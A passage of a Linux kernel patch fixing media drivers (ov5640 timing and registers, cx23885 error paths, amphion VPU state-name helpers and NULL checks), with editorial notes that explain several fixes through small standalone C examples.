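[Editorial note] The ov2680 hunks above drop the auto-gain/auto-exposure cluster, re-apply all controls after a mode switch via __v4l2_ctrl_handler_setup(), and make the flip controls refuse changes mid-stream. A minimal userspace sketch of that "reject layout changes while streaming" guard — the struct and function names here are hypothetical stand-ins, not the driver's:

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

struct sensor {
	bool is_streaming;
	bool vflip;
};

/* Mirror of the driver pattern: a layout-changing control is only
 * accepted while the sensor is idle, otherwise -EBUSY is returned. */
static int sensor_set_vflip(struct sensor *s, bool val)
{
	if (s->is_streaming)
		return -EBUSY;
	s->vflip = val;	/* in the real driver this is a register update */
	return 0;
}

int main(void)
{
	struct sensor s = { .is_streaming = true };

	printf("while streaming: %d\n", sensor_set_vflip(&s, true)); /* -16 */
	s.is_streaming = false;
	printf("while idle: %d\n", sensor_set_vflip(&s, true));      /* 0 */
	return 0;
}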
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 267f514023e72..2ee832426736d 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -557,9 +557,7 @@ static const struct reg_value ov5640_init_setting[] = {
+ 	{0x4001, 0x02, 0, 0}, {0x4004, 0x02, 0, 0}, {0x3000, 0x00, 0, 0},
+ 	{0x3002, 0x1c, 0, 0}, {0x3004, 0xff, 0, 0}, {0x3006, 0xc3, 0, 0},
+ 	{0x302e, 0x08, 0, 0}, {0x4300, 0x3f, 0, 0},
+-	{0x501f, 0x00, 0, 0}, {0x4407, 0x04, 0, 0},
+-	{0x440e, 0x00, 0, 0}, {0x460b, 0x35, 0, 0}, {0x460c, 0x22, 0, 0},
+-	{0x4837, 0x0a, 0, 0}, {0x3824, 0x02, 0, 0},
++	{0x501f, 0x00, 0, 0}, {0x440e, 0x00, 0, 0}, {0x4837, 0x0a, 0, 0},
+ 	{0x5000, 0xa7, 0, 0}, {0x5001, 0xa3, 0, 0}, {0x5180, 0xff, 0, 0},
+ 	{0x5181, 0xf2, 0, 0}, {0x5182, 0x00, 0, 0}, {0x5183, 0x14, 0, 0},
+ 	{0x5184, 0x25, 0, 0}, {0x5185, 0x24, 0, 0}, {0x5186, 0x09, 0, 0},
+@@ -623,7 +621,8 @@ static const struct reg_value ov5640_setting_low_res[] = {
+ 	{0x3a0a, 0x00, 0, 0}, {0x3a0b, 0xf6, 0, 0}, {0x3a0e, 0x03, 0, 0},
+ 	{0x3a0d, 0x04, 0, 0}, {0x3a14, 0x03, 0, 0}, {0x3a15, 0xd8, 0, 0},
+ 	{0x4001, 0x02, 0, 0}, {0x4004, 0x02, 0, 0},
+-	{0x4407, 0x04, 0, 0}, {0x5001, 0xa3, 0, 0},
++	{0x4407, 0x04, 0, 0}, {0x460b, 0x35, 0, 0}, {0x460c, 0x22, 0, 0},
++	{0x3824, 0x02, 0, 0}, {0x5001, 0xa3, 0, 0},
+ };
+ 
+ static const struct reg_value ov5640_setting_720P_1280_720[] = {
+@@ -2442,16 +2441,13 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+ 	if (sensor->pwdn_gpio) {
+-		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+ 
+ 		/* camera power cycle */
+ 		ov5640_power(sensor, false);
+-		usleep_range(5000, 10000);
++		usleep_range(5000, 10000);	/* t2 */
+ 		ov5640_power(sensor, true);
+-		usleep_range(5000, 10000);
+-
+-		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-		usleep_range(1000, 2000);
++		usleep_range(1000, 2000);	/* t3 */
+ 
+ 		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 	} else {
+@@ -2459,7 +2455,7 @@ static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ 		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
+ 				 OV5640_REG_SYS_CTRL0_SW_RST);
+ 	}
+-	usleep_range(20000, 25000);
++	usleep_range(20000, 25000);	/* t4 */
+ 
+ 	/*
+ 	 * software standby: allows registers programming;
+@@ -2532,9 +2528,9 @@ static int ov5640_set_power_mipi(struct ov5640_dev *sensor, bool on)
+ 	 *		  "ov5640_set_stream_mipi()")
+ 	 * [4] = 0	: Power up MIPI HS Tx
+ 	 * [3] = 0	: Power up MIPI LS Rx
+-	 * [2] = 0	: MIPI interface disabled
++	 * [2] = 1	: MIPI interface enabled
+ 	 */
+-	ret = ov5640_write_reg(sensor, OV5640_REG_IO_MIPI_CTRL00, 0x40);
++	ret = ov5640_write_reg(sensor, OV5640_REG_IO_MIPI_CTRL00, 0x44);
+ 	if (ret)
+ 		return ret;
+ 
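[Editorial note] The OV5640_REG_IO_MIPI_CTRL00 change only sets bit 2 (MIPI interface enable, per the comment above) on top of the previous 0x40. A tiny standalone check of the arithmetic — the bit-6 name below is illustrative, not taken from this patch:

#include <stdint.h>
#include <stdio.h>

#define MIPI_CTRL00_BIT6		(1u << 6) /* already set in the old 0x40 value */
#define MIPI_CTRL00_INTERFACE_EN	(1u << 2) /* newly enabled by the fix */

int main(void)
{
	uint8_t old_val = MIPI_CTRL00_BIT6;
	uint8_t new_val = MIPI_CTRL00_BIT6 | MIPI_CTRL00_INTERFACE_EN;

	printf("old: 0x%02x, new: 0x%02x\n", old_val, new_val); /* 0x40, 0x44 */
	return 0;
}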
+diff --git a/drivers/media/i2c/rdacm21.c b/drivers/media/i2c/rdacm21.c
+index 9ccc56c30d3b0..d269c541ebe4c 100644
+--- a/drivers/media/i2c/rdacm21.c
++++ b/drivers/media/i2c/rdacm21.c
+@@ -351,7 +351,7 @@ static void ov10640_power_up(struct rdacm21_device *dev)
+ static int ov10640_check_id(struct rdacm21_device *dev)
+ {
+ 	unsigned int i;
+-	u8 val;
++	u8 val = 0;
+ 
+ 	/* Read OV10640 ID to test communications. */
+ 	for (i = 0; i < OV10640_PID_TIMEOUT; ++i) {
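[Editorial note] The rdacm21 one-liner initializes val so a failed I2C read no longer leaves the ID check comparing stack garbage. A self-contained illustration of the hazard; read_reg() is a stand-in, not the driver's helper:

#include <stdint.h>
#include <stdio.h>

/* Stand-in for an I2C read that can fail before writing *val. */
static int read_reg(uint8_t *val, int fail)
{
	if (fail)
		return -1;	/* *val left untouched on error */
	*val = 0x40;		/* pretend this is the chip ID */
	return 0;
}

int main(void)
{
	uint8_t val = 0;	/* the fix: a failed read now yields 0, not garbage */

	if (read_reg(&val, 1) < 0)
		printf("read failed, val = 0x%02x (deterministic)\n", val);
	return 0;
}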
+diff --git a/drivers/media/i2c/tvp5150.c b/drivers/media/i2c/tvp5150.c
+index 859f1cb2fa744..84f87c016f9b5 100644
+--- a/drivers/media/i2c/tvp5150.c
++++ b/drivers/media/i2c/tvp5150.c
+@@ -2068,6 +2068,10 @@ static int tvp5150_parse_dt(struct tvp5150 *decoder, struct device_node *np)
+ 		tvpc->ent.name = devm_kasprintf(dev, GFP_KERNEL, "%s %s",
+ 						v4l2c->name, v4l2c->label ?
+ 						v4l2c->label : "");
++		if (!tvpc->ent.name) {
++			ret = -ENOMEM;
++			goto err_free;
++		}
+ 	}
+ 
+ 	ep_np = of_graph_get_endpoint_by_regs(np, TVP5150_PAD_VID_OUT, 0);
+diff --git a/drivers/media/pci/bt8xx/dst.c b/drivers/media/pci/bt8xx/dst.c
+index 3e52a51982d76..110651e478314 100644
+--- a/drivers/media/pci/bt8xx/dst.c
++++ b/drivers/media/pci/bt8xx/dst.c
+@@ -1722,7 +1722,7 @@ struct dst_state *dst_attach(struct dst_state *state, struct dvb_adapter *dvb_ad
+ 	return state;				/*	Manu (DST is a card not a frontend)	*/
+ }
+ 
+-EXPORT_SYMBOL(dst_attach);
++EXPORT_SYMBOL_GPL(dst_attach);
+ 
+ static const struct dvb_frontend_ops dst_dvbt_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/pci/bt8xx/dst_ca.c b/drivers/media/pci/bt8xx/dst_ca.c
+index 85fcdc59f0d18..571392d80ccc6 100644
+--- a/drivers/media/pci/bt8xx/dst_ca.c
++++ b/drivers/media/pci/bt8xx/dst_ca.c
+@@ -668,7 +668,7 @@ struct dvb_device *dst_ca_attach(struct dst_state *dst, struct dvb_adapter *dvb_
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(dst_ca_attach);
++EXPORT_SYMBOL_GPL(dst_ca_attach);
+ 
+ MODULE_DESCRIPTION("DST DVB-S/T/C Combo CA driver");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/pci/cx23885/cx23885-dvb.c b/drivers/media/pci/cx23885/cx23885-dvb.c
+index 8fd5b6ef24282..7551ca4a322a4 100644
+--- a/drivers/media/pci/cx23885/cx23885-dvb.c
++++ b/drivers/media/pci/cx23885/cx23885-dvb.c
+@@ -2459,16 +2459,10 @@ static int dvb_register(struct cx23885_tsport *port)
+ 			request_module("%s", info.type);
+ 			client_tuner = i2c_new_client_device(&dev->i2c_bus[1].i2c_adap, &info);
+ 			if (!i2c_client_has_driver(client_tuner)) {
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			if (!try_module_get(client_tuner->dev.driver->owner)) {
+ 				i2c_unregister_device(client_tuner);
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			port->i2c_client_tuner = client_tuner;
+@@ -2505,16 +2499,10 @@ static int dvb_register(struct cx23885_tsport *port)
+ 			request_module("%s", info.type);
+ 			client_tuner = i2c_new_client_device(&dev->i2c_bus[1].i2c_adap, &info);
+ 			if (!i2c_client_has_driver(client_tuner)) {
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			if (!try_module_get(client_tuner->dev.driver->owner)) {
+ 				i2c_unregister_device(client_tuner);
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			port->i2c_client_tuner = client_tuner;
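[Editorial note] The cx23885 hunks delete cleanup steps that the frontend_detach label already performs, so each error path unwinds exactly once instead of freeing the demod client twice. A generic userspace sketch of the single-unwind-label idiom (resource names are made up):

#include <stdlib.h>

static int setup(void)
{
	char *demod = NULL, *tuner = NULL;

	demod = malloc(16);
	if (!demod)
		goto err;

	tuner = malloc(16);
	if (!tuner)
		goto err;	/* no duplicated free(demod) on this path */

	free(tuner);
	free(demod);
	return 0;

err:
	/* One label owns the whole unwind, mirroring frontend_detach;
	 * free(NULL) is a safe no-op, like the kernel's release helpers. */
	free(tuner);
	free(demod);
	return -1;
}

int main(void)
{
	return setup() ? 1 : 0;
}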
+diff --git a/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c b/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
+index 6868a0c4fc82a..520ebd16b0c44 100644
+--- a/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
++++ b/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
+@@ -112,7 +112,7 @@ struct dvb_frontend *ddbridge_dummy_fe_qam_attach(void)
+ 	state->frontend.demodulator_priv = state;
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(ddbridge_dummy_fe_qam_attach);
++EXPORT_SYMBOL_GPL(ddbridge_dummy_fe_qam_attach);
+ 
+ static const struct dvb_frontend_ops ddbridge_dummy_fe_qam_ops = {
+ 	.delsys = { SYS_DVBC_ANNEX_A },
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index c08b5a2bfc1df..dc35a87e628ec 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -249,7 +249,8 @@ static int vdec_update_state(struct vpu_inst *inst, enum vpu_codec_state state,
+ 		vdec->state = VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE;
+ 
+ 	if (inst->state != pre_state)
+-		vpu_trace(inst->dev, "[%d] %d -> %d\n", inst->id, pre_state, inst->state);
++		vpu_trace(inst->dev, "[%d] %s -> %s\n", inst->id,
++			  vpu_codec_state_name(pre_state), vpu_codec_state_name(inst->state));
+ 
+ 	if (inst->state == VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE)
+ 		vdec_handle_resolution_change(inst);
+@@ -956,6 +957,7 @@ static int vdec_response_frame_abnormal(struct vpu_inst *inst)
+ {
+ 	struct vdec_t *vdec = inst->priv;
+ 	struct vpu_fs_info info;
++	int ret;
+ 
+ 	if (!vdec->req_frame_count)
+ 		return 0;
+@@ -963,7 +965,9 @@ static int vdec_response_frame_abnormal(struct vpu_inst *inst)
+ 	memset(&info, 0, sizeof(info));
+ 	info.type = MEM_RES_FRAME;
+ 	info.tag = vdec->seq_tag + 0xf0;
+-	vpu_session_alloc_fs(inst, &info);
++	ret = vpu_session_alloc_fs(inst, &info);
++	if (ret)
++		return ret;
+ 	vdec->req_frame_count--;
+ 
+ 	return 0;
+@@ -994,8 +998,8 @@ static int vdec_response_frame(struct vpu_inst *inst, struct vb2_v4l2_buffer *vb
+ 		return -EINVAL;
+ 	}
+ 
+-	dev_dbg(inst->dev, "[%d] state = %d, alloc fs %d, tag = 0x%x\n",
+-		inst->id, inst->state, vbuf->vb2_buf.index, vdec->seq_tag);
++	dev_dbg(inst->dev, "[%d] state = %s, alloc fs %d, tag = 0x%x\n",
++		inst->id, vpu_codec_state_name(inst->state), vbuf->vb2_buf.index, vdec->seq_tag);
+ 	vpu_buf = to_vpu_vb2_buffer(vbuf);
+ 
+ 	memset(&info, 0, sizeof(info));
+@@ -1354,7 +1358,7 @@ static void vdec_abort(struct vpu_inst *inst)
+ 	struct vpu_rpc_buffer_desc desc;
+ 	int ret;
+ 
+-	vpu_trace(inst->dev, "[%d] state = %d\n", inst->id, inst->state);
++	vpu_trace(inst->dev, "[%d] state = %s\n", inst->id, vpu_codec_state_name(inst->state));
+ 
+ 	vdec->aborting = true;
+ 	vpu_iface_add_scode(inst, SCODE_PADDING_ABORT);
+@@ -1407,9 +1411,7 @@ static void vdec_release(struct vpu_inst *inst)
+ {
+ 	if (inst->id != VPU_INST_NULL_ID)
+ 		vpu_trace(inst->dev, "[%d]\n", inst->id);
+-	vpu_inst_lock(inst);
+ 	vdec_stop(inst, true);
+-	vpu_inst_unlock(inst);
+ }
+ 
+ static void vdec_cleanup(struct vpu_inst *inst)
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index e8cb22da938e6..1df2b35c1a240 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -278,7 +278,7 @@ static int venc_g_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ {
+ 	struct vpu_inst *inst = to_inst(file);
+ 	struct venc_t *venc = inst->priv;
+-	struct v4l2_fract *timeperframe = &parm->parm.capture.timeperframe;
++	struct v4l2_fract *timeperframe;
+ 
+ 	if (!parm)
+ 		return -EINVAL;
+@@ -289,6 +289,7 @@ static int venc_g_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ 	if (!vpu_helper_check_type(inst, parm->type))
+ 		return -EINVAL;
+ 
++	timeperframe = &parm->parm.capture.timeperframe;
+ 	parm->parm.capture.capability = V4L2_CAP_TIMEPERFRAME;
+ 	parm->parm.capture.readbuffers = 0;
+ 	timeperframe->numerator = venc->params.frame_rate.numerator;
+@@ -301,7 +302,7 @@ static int venc_s_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ {
+ 	struct vpu_inst *inst = to_inst(file);
+ 	struct venc_t *venc = inst->priv;
+-	struct v4l2_fract *timeperframe = &parm->parm.capture.timeperframe;
++	struct v4l2_fract *timeperframe;
+ 	unsigned long n, d;
+ 
+ 	if (!parm)
+@@ -313,6 +314,7 @@ static int venc_s_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ 	if (!vpu_helper_check_type(inst, parm->type))
+ 		return -EINVAL;
+ 
++	timeperframe = &parm->parm.capture.timeperframe;
+ 	if (!timeperframe->numerator)
+ 		timeperframe->numerator = venc->params.frame_rate.numerator;
+ 	if (!timeperframe->denominator)
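[Editorial note] The venc hunks delay taking &parm->parm.capture.timeperframe until after the !parm check, since forming a member address through a NULL pointer is undefined behavior even if it is never dereferenced. Reduced to standard C with invented struct shapes:

#include <stdio.h>

struct fract { unsigned num, den; };
struct parm { struct fract timeperframe; };

static int g_parm(struct parm *parm)
{
	struct fract *tpf;

	if (!parm)
		return -1;

	/* Safe: the member address is only formed once parm != NULL. */
	tpf = &parm->timeperframe;
	tpf->num = 1;
	tpf->den = 30;
	return 0;
}

int main(void)
{
	struct parm p;

	printf("%d\n", g_parm(NULL));	/* -1, no UB */
	printf("%d\n", g_parm(&p));	/* 0 */
	return 0;
}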
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index 048c23c2bf4db..deb2288d42904 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -353,6 +353,9 @@ void vpu_inst_record_flow(struct vpu_inst *inst, u32 flow);
+ int vpu_core_driver_init(void);
+ void vpu_core_driver_exit(void);
+ 
++const char *vpu_id_name(u32 id);
++const char *vpu_codec_state_name(enum vpu_codec_state state);
++
+ extern bool debug;
+ #define vpu_trace(dev, fmt, arg...)					\
+ 	do {								\
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index fa581ba6bab2d..235b71398d403 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -98,7 +98,7 @@ static struct vpu_cmd_t *vpu_alloc_cmd(struct vpu_inst *inst, u32 id, void *data
+ 	cmd->id = id;
+ 	ret = vpu_iface_pack_cmd(inst->core, cmd->pkt, inst->id, id, data);
+ 	if (ret) {
+-		dev_err(inst->dev, "iface pack cmd(%d) fail\n", id);
++		dev_err(inst->dev, "iface pack cmd %s fail\n", vpu_id_name(id));
+ 		vfree(cmd->pkt);
+ 		vfree(cmd);
+ 		return NULL;
+@@ -125,14 +125,14 @@ static int vpu_session_process_cmd(struct vpu_inst *inst, struct vpu_cmd_t *cmd)
+ {
+ 	int ret;
+ 
+-	dev_dbg(inst->dev, "[%d]send cmd(0x%x)\n", inst->id, cmd->id);
++	dev_dbg(inst->dev, "[%d]send cmd %s\n", inst->id, vpu_id_name(cmd->id));
+ 	vpu_iface_pre_send_cmd(inst);
+ 	ret = vpu_cmd_send(inst->core, cmd->pkt);
+ 	if (!ret) {
+ 		vpu_iface_post_send_cmd(inst);
+ 		vpu_inst_record_flow(inst, cmd->id);
+ 	} else {
+-		dev_err(inst->dev, "[%d] iface send cmd(0x%x) fail\n", inst->id, cmd->id);
++		dev_err(inst->dev, "[%d] iface send cmd %s fail\n", inst->id, vpu_id_name(cmd->id));
+ 	}
+ 
+ 	return ret;
+@@ -149,7 +149,8 @@ static void vpu_process_cmd_request(struct vpu_inst *inst)
+ 	list_for_each_entry_safe(cmd, tmp, &inst->cmd_q, list) {
+ 		list_del_init(&cmd->list);
+ 		if (vpu_session_process_cmd(inst, cmd))
+-			dev_err(inst->dev, "[%d] process cmd(%d) fail\n", inst->id, cmd->id);
++			dev_err(inst->dev, "[%d] process cmd %s fail\n",
++				inst->id, vpu_id_name(cmd->id));
+ 		if (cmd->request) {
+ 			inst->pending = (void *)cmd;
+ 			break;
+@@ -305,7 +306,8 @@ static void vpu_core_keep_active(struct vpu_core *core)
+ 
+ 	dev_dbg(core->dev, "try to wake up\n");
+ 	mutex_lock(&core->cmd_lock);
+-	vpu_cmd_send(core, &pkt);
++	if (vpu_cmd_send(core, &pkt))
++		dev_err(core->dev, "fail to keep active\n");
+ 	mutex_unlock(&core->cmd_lock);
+ }
+ 
+@@ -313,7 +315,7 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ {
+ 	unsigned long key;
+ 	int sync = false;
+-	int ret = -EINVAL;
++	int ret;
+ 
+ 	if (inst->id < 0)
+ 		return -EINVAL;
+@@ -339,7 +341,7 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ 
+ exit:
+ 	if (ret)
+-		dev_err(inst->dev, "[%d] send cmd(0x%x) fail\n", inst->id, id);
++		dev_err(inst->dev, "[%d] send cmd %s fail\n", inst->id, vpu_id_name(id));
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/amphion/vpu_core.c b/drivers/media/platform/amphion/vpu_core.c
+index be80410682681..9add73b9b45f9 100644
+--- a/drivers/media/platform/amphion/vpu_core.c
++++ b/drivers/media/platform/amphion/vpu_core.c
+@@ -88,6 +88,8 @@ static int vpu_core_boot_done(struct vpu_core *core)
+ 
+ 		core->supported_instance_count = min(core->supported_instance_count, count);
+ 	}
++	if (core->supported_instance_count >= BITS_PER_TYPE(core->instance_mask))
++		core->supported_instance_count = BITS_PER_TYPE(core->instance_mask);
+ 	core->fw_version = fw_version;
+ 	vpu_core_set_state(core, VPU_CORE_ACTIVE);
+ 
+diff --git a/drivers/media/platform/amphion/vpu_dbg.c b/drivers/media/platform/amphion/vpu_dbg.c
+index 260f1c4b8f8dc..f105da82d92f9 100644
+--- a/drivers/media/platform/amphion/vpu_dbg.c
++++ b/drivers/media/platform/amphion/vpu_dbg.c
+@@ -50,6 +50,13 @@ static char *vpu_stat_name[] = {
+ 	[VPU_BUF_STATE_ERROR] = "error",
+ };
+ 
++static inline const char *to_vpu_stat_name(int state)
++{
++	if (state <= VPU_BUF_STATE_ERROR)
++		return vpu_stat_name[state];
++	return "unknown";
++}
++
+ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ {
+ 	struct vpu_inst *inst = s->private;
+@@ -67,7 +74,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 	num = scnprintf(str, sizeof(str), "tgig = %d,pid = %d\n", inst->tgid, inst->pid);
+ 	if (seq_write(s, str, num))
+ 		return 0;
+-	num = scnprintf(str, sizeof(str), "state = %d\n", inst->state);
++	num = scnprintf(str, sizeof(str), "state = %s\n", vpu_codec_state_name(inst->state));
+ 	if (seq_write(s, str, num))
+ 		return 0;
+ 	num = scnprintf(str, sizeof(str),
+@@ -141,7 +148,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 		num = scnprintf(str, sizeof(str),
+ 				"output [%2d] state = %10s, %8s\n",
+ 				i, vb2_stat_name[vb->state],
+-				vpu_stat_name[vpu_get_buffer_state(vbuf)]);
++				to_vpu_stat_name(vpu_get_buffer_state(vbuf)));
+ 		if (seq_write(s, str, num))
+ 			return 0;
+ 	}
+@@ -156,7 +163,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 		num = scnprintf(str, sizeof(str),
+ 				"capture[%2d] state = %10s, %8s\n",
+ 				i, vb2_stat_name[vb->state],
+-				vpu_stat_name[vpu_get_buffer_state(vbuf)]);
++				to_vpu_stat_name(vpu_get_buffer_state(vbuf)));
+ 		if (seq_write(s, str, num))
+ 			return 0;
+ 	}
+@@ -188,9 +195,9 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 
+ 		if (!inst->flows[idx])
+ 			continue;
+-		num = scnprintf(str, sizeof(str), "\t[%s]0x%x\n",
++		num = scnprintf(str, sizeof(str), "\t[%s] %s\n",
+ 				inst->flows[idx] >= VPU_MSG_ID_NOOP ? "M" : "C",
+-				inst->flows[idx]);
++				vpu_id_name(inst->flows[idx]));
+ 		if (seq_write(s, str, num)) {
+ 			mutex_unlock(&inst->core->cmd_lock);
+ 			return 0;
+diff --git a/drivers/media/platform/amphion/vpu_helpers.c b/drivers/media/platform/amphion/vpu_helpers.c
+index e9aeb3453dfcb..2e78666322f02 100644
+--- a/drivers/media/platform/amphion/vpu_helpers.c
++++ b/drivers/media/platform/amphion/vpu_helpers.c
+@@ -11,6 +11,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include "vpu.h"
++#include "vpu_defs.h"
+ #include "vpu_core.h"
+ #include "vpu_rpc.h"
+ #include "vpu_helpers.h"
+@@ -412,3 +413,63 @@ int vpu_find_src_by_dst(struct vpu_pair *pairs, u32 cnt, u32 dst)
+ 
+ 	return -EINVAL;
+ }
++
++const char *vpu_id_name(u32 id)
++{
++	switch (id) {
++	case VPU_CMD_ID_NOOP: return "noop";
++	case VPU_CMD_ID_CONFIGURE_CODEC: return "configure codec";
++	case VPU_CMD_ID_START: return "start";
++	case VPU_CMD_ID_STOP: return "stop";
++	case VPU_CMD_ID_ABORT: return "abort";
++	case VPU_CMD_ID_RST_BUF: return "reset buf";
++	case VPU_CMD_ID_SNAPSHOT: return "snapshot";
++	case VPU_CMD_ID_FIRM_RESET: return "reset firmware";
++	case VPU_CMD_ID_UPDATE_PARAMETER: return "update parameter";
++	case VPU_CMD_ID_FRAME_ENCODE: return "encode frame";
++	case VPU_CMD_ID_SKIP: return "skip";
++	case VPU_CMD_ID_FS_ALLOC: return "alloc fb";
++	case VPU_CMD_ID_FS_RELEASE: return "release fb";
++	case VPU_CMD_ID_TIMESTAMP: return "timestamp";
++	case VPU_CMD_ID_DEBUG: return "debug";
++	case VPU_MSG_ID_RESET_DONE: return "reset done";
++	case VPU_MSG_ID_START_DONE: return "start done";
++	case VPU_MSG_ID_STOP_DONE: return "stop done";
++	case VPU_MSG_ID_ABORT_DONE: return "abort done";
++	case VPU_MSG_ID_BUF_RST: return "buf reset done";
++	case VPU_MSG_ID_MEM_REQUEST: return "mem request";
++	case VPU_MSG_ID_PARAM_UPD_DONE: return "param upd done";
++	case VPU_MSG_ID_FRAME_INPUT_DONE: return "frame input done";
++	case VPU_MSG_ID_ENC_DONE: return "encode done";
++	case VPU_MSG_ID_DEC_DONE: return "frame display";
++	case VPU_MSG_ID_FRAME_REQ: return "fb request";
++	case VPU_MSG_ID_FRAME_RELEASE: return "fb release";
++	case VPU_MSG_ID_SEQ_HDR_FOUND: return "seq hdr found";
++	case VPU_MSG_ID_RES_CHANGE: return "resolution change";
++	case VPU_MSG_ID_PIC_HDR_FOUND: return "pic hdr found";
++	case VPU_MSG_ID_PIC_DECODED: return "picture decoded";
++	case VPU_MSG_ID_PIC_EOS: return "eos";
++	case VPU_MSG_ID_FIFO_LOW: return "fifo low";
++	case VPU_MSG_ID_BS_ERROR: return "bs error";
++	case VPU_MSG_ID_UNSUPPORTED: return "unsupported";
++	case VPU_MSG_ID_FIRMWARE_XCPT: return "exception";
++	case VPU_MSG_ID_PIC_SKIPPED: return "skipped";
++	}
++	return "<unknown>";
++}
++
++const char *vpu_codec_state_name(enum vpu_codec_state state)
++{
++	switch (state) {
++	case VPU_CODEC_STATE_DEINIT: return "initialization";
++	case VPU_CODEC_STATE_CONFIGURED: return "configured";
++	case VPU_CODEC_STATE_START: return "start";
++	case VPU_CODEC_STATE_STARTED: return "started";
++	case VPU_CODEC_STATE_ACTIVE: return "active";
++	case VPU_CODEC_STATE_SEEK: return "seek";
++	case VPU_CODEC_STATE_STOP: return "stop";
++	case VPU_CODEC_STATE_DRAIN: return "drain";
++	case VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE: return "resolution change";
++	}
++	return "<unknown>";
++}
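[Editorial note] vpu_id_name() and vpu_codec_state_name() turn raw command/state numbers into readable strings, so the trace lines elsewhere in this patch log "%s -> %s" instead of two integers. A hypothetical standalone reduction of the pattern:

#include <stdio.h>

enum state { STATE_DEINIT, STATE_START, STATE_ACTIVE };

static const char *state_name(enum state s)
{
	switch (s) {
	case STATE_DEINIT: return "initialization";
	case STATE_START:  return "start";
	case STATE_ACTIVE: return "active";
	}
	return "<unknown>";	/* reached for out-of-range values */
}

int main(void)
{
	/* What the driver's vpu_trace() call now effectively prints. */
	printf("[0] %s -> %s\n", state_name(STATE_START),
	       state_name(STATE_ACTIVE));
	return 0;
}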
+diff --git a/drivers/media/platform/amphion/vpu_mbox.c b/drivers/media/platform/amphion/vpu_mbox.c
+index bf759eb2fd46d..b6d5b4844f672 100644
+--- a/drivers/media/platform/amphion/vpu_mbox.c
++++ b/drivers/media/platform/amphion/vpu_mbox.c
+@@ -46,11 +46,10 @@ static int vpu_mbox_request_channel(struct device *dev, struct vpu_mbox *mbox)
+ 	cl->rx_callback = vpu_mbox_rx_callback;
+ 
+ 	ch = mbox_request_channel_byname(cl, mbox->name);
+-	if (IS_ERR(ch)) {
+-		dev_err(dev, "Failed to request mbox chan %s, ret : %ld\n",
+-			mbox->name, PTR_ERR(ch));
+-		return PTR_ERR(ch);
+-	}
++	if (IS_ERR(ch))
++		return dev_err_probe(dev, PTR_ERR(ch),
++				     "Failed to request mbox chan %s\n",
++				     mbox->name);
+ 
+ 	mbox->ch = ch;
+ 	return 0;
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index 92672a802b492..d0ead051f7d18 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -32,7 +32,7 @@ static void vpu_session_handle_start_done(struct vpu_inst *inst, struct vpu_rpc_
+ 
+ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_pkt_mem_req_data req_data;
++	struct vpu_pkt_mem_req_data req_data = { 0 };
+ 
